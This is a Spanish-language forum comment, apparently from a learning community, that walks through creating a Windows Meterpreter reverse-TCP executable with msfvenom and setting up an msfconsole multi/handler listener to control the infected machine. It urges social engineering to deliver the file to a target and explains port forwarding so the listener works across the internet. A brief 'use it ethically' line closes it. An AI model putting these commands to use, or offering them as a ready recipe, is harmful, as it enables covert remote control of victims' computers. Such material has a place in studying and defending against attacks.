Hola, mencionar también que para crear un malware desde la distro de Linux, Kali Linux, pueden seguir los siguientes pasos:
Desde la consola escribir
msfvenom -p windows/meterpreter/reverse_tcp LHOST=(LaIpDelHost) LPORT=(ElNúmeroDelPuerto) -f > exe (NombreDelMalware).exe
¿Qué estamos haciendo?
Bien, primero estamos usando la herramienta msfvenom, la cual nos sirve para crear payloads, el -p es para asignar que paylodad usaremos, en este caso se usara el payload “windows/meterpreter/reverse_tcp” esto significa que tendremos una sesión de meterpreter para controlar al equipo infectado a través de un protocolo tcp reverso, luego estamos asignado el LHOST, es decir, la ip del equipo desde la cual controlaremos al equipo infectado, luego el LPORT que por defecto se usa el 4444, luego le asignamos el formato y le decimos que será un .exe y le damos un nombre, y así nos generará el malware, ya queda usar algo de ingeniería social para hacer que este malware entre al equipo que queremos infectar. (Cabe resaltar que este tipo de malware ya es detectado por muchos antivirus, es solo como guía para que vean como se pueden crear malware un poco más “avanzados”.
Luego de esto, necesitamos tener en escucha nuestra consola para poder conectarnos remotamente al equipo infectado, para poder poner nuestra consola en escucha, usaremos:
Primero escribimos:
msfconsole
Una vez que se abra msfconsole escribimos los siguientes comandos:
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST (LaIpDelHost)
set LPORT (ElNúmeroDelPuerto)
una vez configurado escribiremos:
exploit o run
le damos a enter y ya estará escuchando.
(Este método funciona en redes lan donde ambos dispositivos, el atacante y el atacado están en la misma red, puede ser en redes externas a la privada pero en ese caso se tendría que abrir el puerto a usar en la configuración del router y usar la ip publica de nuestra máquina no la privada.)
Úsenlo para fines éticos.
¿Quieres ver más aportes, preguntas y respuestas de la comunidad?
o inicia sesión.